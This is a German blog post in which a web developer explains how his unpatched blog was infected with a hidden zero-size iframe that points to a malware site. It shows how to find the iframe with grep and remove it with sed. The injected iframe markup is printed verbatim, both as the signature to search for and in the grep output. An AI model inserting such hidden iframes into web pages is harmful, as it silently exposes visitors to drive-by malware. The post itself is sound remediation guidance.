Heute wurde ich daran erinnert, dass nicht aktualisierte Blogsoftware so einigen Schaden anrichten kann. Wie auch immer sie es geschafft haben, einer meiner Blogs wurde infiziert und das ziemlich ordentlich. Offenbar handelte es sich um ein einfaches Script, dass an jede PHP und HTML Seite einen iframe zu einer Virenseite angehängt. Mittlerweile ist der Schaden behoben, doch ich als Webentwickler bin auch nur durch den Tipp eine Freundes darauf aufmerksam geworden. Von dieser Attacke können auch normale Homepages betroffen sein und wie man das ganze löst zeige in diesem Artikel.

Zunächst einmal sollte man checken ob die eigenen Seiten infiziert sind. Das merkt man indem man folgendes im Quellcode ganz am Ende findet:

</html><iframe src="http://reycross.net/lib/index.php...

Mit folgendem Grep Aufruf kann man seinen Ordner rekursiv nach dieser Erweiterung durchsuchen:

grep -R "http://reycross.net/lib/index.php" *

Sollte grep etwas finden, sieht dies so aus:

error/authorizationRequired.html:</HTML><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
error/fileNotFound.html:</HTML><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
error/forbidden.html:</HTML><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
error/internalServerError.html:</HTML><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
error/invalidSyntax.html:</HTML><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Um das Ganze zu beheben verwenden wir ebenfalls ein BASH Script: (Vorsicht, der aktuelle Ordner wird rekursiv durchsucht und der Dateiinhalt ersetzt, schaut euch das Script genau an bevor ihr es aufruft, für Fehler hafte ich nicht)

sed -i 's/<iframe src="http:\/\/reycross.net\/lib\/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' `find . -name \*.htm`

Dieses Skript löscht unseren Übeltäter aus allen .htm Dateien. Diese Erweiterung muss für verschiedene Dateitypen natürlich angepasst werden.
Ein Test mit dem vorherigen Grep Befehl gibt Aufschluss ob alles erwischt wurde. Bleibt dem Opfer nur noch die weit zeitaufwendigere Arbeit der Fehlersuche.

Wer über Linux Kommandos und neuste News aus dem IT informiert sein möchte, dem lege ich meine Lieblingszeitung iX ans Herz:

Weiterführende Links: